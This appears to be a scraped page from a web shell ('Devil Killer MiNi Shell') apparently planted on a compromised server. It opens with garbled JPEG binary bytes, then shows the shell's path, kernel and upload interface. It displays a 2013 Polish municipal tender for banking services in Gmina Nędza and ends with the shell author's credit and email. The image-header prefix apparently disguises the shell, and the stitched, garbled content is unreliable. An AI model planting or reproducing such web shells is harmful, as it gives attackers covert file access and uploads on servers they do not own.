JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130201/44194-N-2013.html

<p class="kh_header"><b>Nędza: Obsługa Bankowa Budżetu Gminy Nędza tj. obsługa Urzędu Gminy i gminnych jednostek organizacyjnych</b><br>
<b>Numer ogłoszenia: 44194 - 2013; data zamieszczenia: 01.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nędza , ul. Jana III Sobieskiego 5, 47-440 Nędza, woj. śląskie, tel. 032 410-20-18, 410-20-93.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nedza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Obsługa Bankowa Budżetu Gminy Nędza tj. obsługa Urzędu Gminy i gminnych jednostek organizacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie pełnej obsługi  bankowej  budżetu Gminy Nędza,  tj. bsługa Urzędu Gminy i gminnych jednostek organizacyjnych
2.Zakres podmiotowy   -  prowadzenie w latach 2013 - 2017  bankowej obsługi budżetu Gminy Nędza tj. obsługi Urzędu Gminy i gminnych  jednostek organizacyjnychw  tym :
2.1. Urzędu Gminy w Nędzy , w tym następujących rachunków bankowych:
- rachunek bieżący DOCHODY  ( w zakresie podatków realizowanych przez system masowych płatności ) 
- rachunek bieżący WYDATKI 
- rachunek bieżący DEPOZYTY ( wykorzystywany system zarządzania kaucjami);
- rachunek bieżący ZFŚS;
- rachunek bieżący KSZTAŁCENIE MŁODOCIANYCH PRACOWNIKÓW 
- rachunek bieżący WYDATKI  NIEWYGASAJĄCE 
 2.2. Zespołu Szkolno - Gimnazjalnego  w Nędzy, w tym następujących rachunków  
         bankowych:
- rachunek bieżący 
- rachunek dochodów gromadzonych na wydzielonym rachunku i wydatków nimi finansowanych 
- rachunek bieżący ZFŚS
2.3. Zespołu Szkolno - Przedszkolnego w Babicach,   w tym następujących rachunków bankowych
- rachunek bieżący 
- rachunek dochodów gromadzonych na wydzielonym rachunku i wydatków nimi finansowanych 
- rachunek bieżący ZFŚS
2.4. Zespołu Szkolno - Przedszkolnego w Górkach Śląskich, w tym następujących rachunków bankowych:
- rachunek bieżący 
- rachunek dochodów gromadzonych na wydzielonym rachunku i wydatków nimi finansowanych 
- rachunek bieżący ZFŚS
2.5. Zespołu Szkolno - Przedszkolnego w Zawadzie Książęcej, w tym następujących rachunków bankowych:
- rachunek bieżący 
- rachunek dochodów gromadzonych na wydzielonym rachunku i wydatków nimi finansowanych 
- rachunek bieżący ZFŚS
2.6. Przedszkola w Nędzy, w tym następujących rachunków bankowych:
- rachunek bieżący 
- rachunek dochodów gromadzonych na wydzielonym rachunku i wydatków nimi finansowanych 
- rachunek bieżący ZFŚS
2.7. Gminnego Ośrodka Pomocy Społecznej  w Nędzy, w tym następujących rachunków bankowych:
- rachunek bieżący 
- rachunek bieżący - realizacja programu  SZANSA - program aktywnej integracji  w Gminie Nędza
3.Zakres przedmiotowy   -   bankowa  obsługa budżetu Urzędu Gminy i gminnych  jednostek organizacyjnych obejmuje w szczególności :
3.1. otwieranie, zamykanie i prowadzenie bankowych rachunków rozliczeniowych, w tym rachunku bieżącego ( podstawowego ) oraz rachunków pomocniczych, wskazanych w pkt II, jak również innych - o ile w trakcie realizacji tych umów wystąpi taka konieczność
3.2. przechowywanie środków pieniężnych na rachunku bieżącym i rachunkach   
pomocniczych, określonych umową lub otwartymi na wniosek podmiotów określonych  w pkt II  w  trakcie trwania umowy obsługi bankowej 
3.3. zapewnienie korzystania z systemu bankowości elektronicznej i systemu wypłat elektronicznych
3.4. prowadzenie rozliczeń pieniężnych na w/w rachunkach bankowych, w tym:
3.4.1. dokonywanie wpłat (odprowadzenie gotówki przez pracownika Urzędu Gminy  lub gminnej jednostki organizacyjnej ) i wypłat gotówkowych ( pobranie gotówki przez  pracownika Urzędu Gminy  lub   gminnej jednostki organizacyjnej )  na podstawie   przedstawionych do realizacji poleceń płatniczych
3.4.2. wykonywanie dyspozycji  płatniczych   ( np. poleceń przelewu, lokowania wolnych środków , naliczania  odsetek od środków zgromadzonych na rachunkach   bankowych oraz innych dyspozycji posiadacza rachunku)  i przeprowadzanie    
wszelkich rozliczeń - realizacja przelewów  na  rachunki  w  banku obsługującym    oraz  w innych bankach 
3.4.3.wykonywanie dyspozycji dotyczącej obsługi dewizowej, w tym realizacja poleceń przelewu w kraju i za granicą 
3.5. generowanie wyciągów z wykonywanych operacji bankowych 
3.6. wymiana gotówki na bilon
3.7. przekazywanie informacji o saldzie rachunków bankowych
3.8. przyjmowanie wolnych środków zgromadzonych na rachunkach bankowych na lokaty krótkoterminowe ( dotyczy wyłącznie wskazanego rachunku bankowego budżetu)
3.9.administrowanie rachunkami bankowymi, to jest m.in. :
3.9.1. wydawanie w miarę  potrzeb opinii o rachunkach bankowych
3.9.2.sporządzanie w miarę potrzeb na żądanie zestawienia oprocentowania depozytów itp.
3.10.zapewnienie możliwości zaciągnięcia kredytu ( w rachunku bieżącym) na pokrycie występującego w ciągu roku budżetowego przejściowego deficytu budżetu w kwocie   300 000,00 zł - zgodnie z upoważnieniem Rady Gminy ( dotyczy wyłącznie  wskazanego  rachunku bankowego budżetu - rachunek bieżący: DOCHODY)
3.11. elektroniczna bankowa obsługa budżetu Gminy Nędza, tj. obsługi Urzędu Gminy i gminnych jednostek administracyjnych 
3.11.1.dostarczenie właściwego oprogramowania, urządzeń i narzędzi niezbędnych  do  właściwego funkcjonowania i obsługi operacji bankowych oraz wymiany informacji  pomiędzy bankiem a posiadaczami rachunków w trybie on - line 
3.11.2.synchronizacja posiadanego oprogramowania z programami finansowo -  księgowymi stosowanymi w Urzędzie Gminy i jednostkach organizacyjnych Gminy
3.11.3.wdrożenie systemu identyfikacji (płatności masowych) oraz jego obsługa ( dotyczy wyłącznie wskazanego rachunku bankowego budżetu - rachunek bieżący:  DOCHODY) oraz wdrożenie systemu zarządzania kaucjami ( dotyczy rachunku bieżącego DEPOZYTY) 
3.11.4.zapewnienie bezpieczeństwa teleinformatycznego danych wprowadzonych,  gromadzonych, przetwarzanych i wysyłanych z systemu elektronicznej obsługi bankowej 
3.11.5.zapewnienie w trakcie trwania umowy i w okresie 5 lat po jej zakończeniu   archiwizacji i dostępu do dokumentów źródłowych, stanowiących podstawę ewidencji poszczególnych operacji na rachunkach bankowych 
3.11.6.przeszkolenie pracowników w zakresie obsługi oprogramowania;
3.11.7.udostępnienie usługi (teleserwis) umożliwiającej uzyskanie telefonicznej informacji o stanie rachunków bankowych;
3.12. wykonywanie innych czynności określonych projektami umów na bankową obsługę budżetu Gminy Nędza,  tj. obsługę Urzędu Gminy i gminnych jednostek organizacyjnych;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2)pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów,
3)aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych potwierdzających odpowiednio, że wykonawca nie zalega  z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz prowadzonych  obsług bankowych jednostek samorządu terytorialnego 
w okresie  ostatnich   3  lat     / +  referencje   -  minimum 2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada wykonawca</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)informacje na temat przeciętnej liczby zatrudnionych pracowników oraz liczebności personelu kierowniczego w okresie ostatnich trzech la</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>polisę lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Bezpieczeństwo banku - 10</li>
<li>3 - Dostępność innych usług oferowanych - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Przedmiot umowy - zgodnie z ofertą z dnia 
2.Okres umowy  od do
3.Bank realizuje wyłącznie dyspozycje podpisane przez osoby upoważnione do  dysponowania     środkami na rachunku,  wymienione w karcie wzorów podpisów  lub innym dokumencie wskazanym przez Bank stanowiący załącznik do niniejszej umowy.
4.Zamawiający zobowiązuje się do pisemnego powiadomienia Banku o zmianie wszelkich danych stanowiących podstawę otwarcia rachunku , a w szczególności o zmianach osób upoważnionych do dysponowania rachunkiem, zmianie siedziby i adresu, zmianie numeru statystycznego.
5.Wysokość oprocentowania środków na rachunku oraz zasady kapitalizacji odsetek (zgodnie z ofertą).
6.Zamawiający upoważnia Bank do pobierania z rachunku bankowego wyłącznie należnych opłat i prowizji za wykonywanie czynności bankowych w wysokościach (zgodnie z ofertą).
7.Ustala się, że wysokość odszkodowania za przekroczenie terminu realizacji dyspozycji Zamawiającego, stanowić będzie równowartość odsetek naliczonych za każdy dzień zwłoki według aktualnej stopy oprocentowania środków na rachunku obliczonej w stosunku do kwoty objętej dyspozycją.
8.Strony postanawiają, że Bank będzie sporządzał codziennie wyciągi bankowe lub zapewni możliwość generowania przez Zamawiającą codziennych wyciągów bankowych
9.Oprocentowanie kredytu w rachunku bieżącym (zgodnie z ofertą).Udzielenie kredytu w rachunku bankowym wymagać będzie zawarcia odrębnej umowy
10.Zakazuje się wprowadzania nowych postanowień do umowy, niekorzystnych dla Zamawiającego, niezgodnych z treścią oferty.
11.W razie okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,  Zamawiający może odstąpić od umowy w terminie miesiąca od powzięcia powyższych okoliczności i w takim przypadku Bank może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części umowy.
12.Sprawy sporne mogące wyniknąć na tle realizacji niniejszej umowy, rozstrzygane będą przez Sąd właściwy ze względu na miejsce wykonania umowy.
13.Umowa zostaje zawarta z chwilą podpisania jej przez obie strony.
14.Umowę sporządzono w dwóch jednobrzmiących egzemplarzach, po 1 egz. dla każdej ze stron.
15.Integralną część umowy stanowią:
a)specyfikacja istotnych warunków zamówienia wraz z załącznikami.
b)oferta wykonawcy wraz z załącznikami. 
c)ogłoszenie o wyborze oferty.
d)karta wzorów podpisów  lub inny dokument wskazany przez Bank stanowiący załącznik do niniejszej umowy 
18. Formą zabezpieczenia kredytu w rachunku bankowym będzie weksel  In blanco 19. Bank zapewni możliwość lokowania środków pieniężnych na oprocentowanych lokatach    
                     terminowych , których warunki zostaną ustalone w drodze negocjacji</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nedza.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Nędzy, ul. Jana III Sobieskiego 5 pokój nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2013 godzina 08:30, miejsce: Urząd Gminy w Nędzy, ul. Jana III Sobieskiego 5 pokój nr 17 SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com